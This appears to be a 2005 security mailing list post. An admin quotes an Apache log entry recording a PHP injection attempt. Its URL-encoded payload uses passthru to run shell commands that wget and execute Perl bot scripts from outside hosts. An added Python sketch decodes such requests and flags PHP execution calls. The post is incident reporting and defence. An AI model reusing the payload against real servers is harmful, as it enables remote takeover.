Security Incidents mailing list archives

Attempted exploit for some web service.


From: Robin <robin () kallisti net nz>
Date: Fri, 28 Jan 2005 00:41:57 +1300

Hi, I just got this in my apache logs:
65.39.227.110 - - [28/Jan/2005:00:23:26 +1300] 
"GET /RobinsStuff/UnsortedLinks&r
ush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.te
mp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://weblicious.com/
.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%6
5%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.
%70%61%73%73%74%68%72%75%28%24%48%5
4%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 
11746 "-" "LWP::Simple/5.65"

(sorry about the wrapping). Now, I know it didn't hurt the service it hit, as 
it's a Wiki page, and the software ignores any unexpected parameters on the 
URL. I'm wondering where it comes from, however. It's also useful to note 
that that IP address hadn't touched my webserver at all recently, other than 
this. Out of curiosity, I checked, and both the URLs that it tries to wget 
stuff from are 404.

-- 
Robin <robin () kallisti net nz>             JabberID: <eythian () jabber org>

Hostes alienigeni me abduxerunt. Qui annus est?

PGP Key 0xA99CEB6D = 5957 6D23 8B16 EFAB FEF8  7175 14D3 6485 A99C EB6D
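A log-triage sketch for requests like the one quoted in the message above, as an added example that is not part of the original post: it percent-decodes each parameter until the value stops changing and flags escaped plain letters, multiple encoding layers and PHP execution calls. The function names, the list of PHP functions and the shortened sample line (placeholder IP and path) are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample modelled on the request in the post; the client IP and
# path are placeholders and the shell payload is cut down to two commands.
SAMPLE = (
    '192.0.2.10 - - [28/Jan/2005:00:23:26 +1300] "GET /wiki/Page'
    '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp'
    '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54'
    '%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 11746 "-" '
    '"LWP::Simple/5.65"'
)

REQUEST = re.compile(r'"[A-Z]+ (.+?) HTTP/\d\.\d"')
# Percent-escapes for plain ASCII letters; normal clients do not escape these.
ENCODED_LETTER = re.compile(r"%(?:[46][1-9A-Fa-f]|[57][0-9Aa])")
# Illustrative (not exhaustive) list of PHP functions that run code or commands.
PHP_EXEC = re.compile(r"\b(?:passthru|system|exec|shell_exec|popen|eval)\s*\(", re.I)


def full_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing; return (text, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def analyse(line):
    """Return {param: (decoded_value, [reasons])} for suspicious parameters."""
    match = REQUEST.search(line)
    findings = {}
    # Split on '?' and '&': the logged request appends parameters with '&' only.
    for piece in re.split(r"[?&]", match.group(1))[1:] if match else []:
        name, sep, raw = piece.partition("=")
        decoded, rounds = full_decode(raw)
        checks = [
            ("encoded-letters", ENCODED_LETTER.search(raw)),
            ("multiply-encoded", rounds > 1),
            ("php-exec-call", PHP_EXEC.search(decoded)),
        ]
        reasons = [label for label, hit in checks if hit]
        if sep and reasons:
            findings[name] = (decoded, reasons)
    return findings
```

On the sample, `highlight` needs two decoding rounds before the `passthru($HTTP_GET_VARS[rush])` call becomes visible, which is why a single-pass filter on the raw log line misses it.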
